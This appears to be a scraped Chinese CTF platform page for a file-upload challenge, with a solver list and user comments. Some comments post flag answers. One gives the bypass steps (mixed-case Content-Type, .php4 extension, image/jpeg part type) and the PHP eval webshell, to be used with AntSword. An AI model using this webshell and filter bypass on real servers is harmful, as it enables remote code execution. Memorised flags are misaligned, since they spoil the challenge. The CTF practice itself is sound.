评分(19)
解题动态
Tonytom 攻破了该题 3天前
Fengyu3321 攻破了该题 4天前
hdcc1 攻破了该题 7天前
kiritoldws 攻破了该题 11天前
6OGnwH04VnCx 攻破了该题 12天前
flag大王 攻破了该题 13天前
scv 攻破了该题 13天前
,, 攻破了该题 14天前
muosa 攻破了该题 16天前
XF003C 攻破了该题 17天前
0xchang 攻破了该题 19天前
Ruaruaburua 攻破了该题 19天前
hhck 攻破了该题 23天前
有点易斯但不多 攻破了该题 23天前
未来的卡司week 攻破了该题 26天前
lanza2451150 攻破了该题 27天前
seyana 攻破了该题 28天前
tiger1cyd 攻破了该题 28天前
15144954824 攻破了该题 29天前
评论
1004025151 1年前
举报
flag{de5fd002182dd65121054872ac5570f0}
冯飞99 2年前
举报
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
zzccbb2005 2年前
举报
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
wjx2958958 2年前
举报
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了
ACHEN8899 2年前
举报
蚁剑连不上是什么原因啊?
XRain 2年前
举报
黑盒测出来也是有可能的,就是在请求头里面改改改,然后仔细观察返回的信息有什么差别。
XRain 2年前
举报
其实, php 后缀的检测机制跟其他后缀如 txt 的不一样,这点是能测出来的,因为 php、php1 和 1php 这些后缀都是返回 invalid file,像 txt、aaa 这种就返回 give me a image file not a php。所以,包含 php 的检测至少用了 strpos() 做判断。我也只测到这种程度,修改 Content-Type 真想不到。
GET-lee 2年前
举报
没任何提示
wxy1343 2年前
举报
flag{bfc44a132d41d1deae0315bccbeed8ac}
17795154884 2年前
举报
flag{502bc6c54e562e1c5d70ab87450f2d02}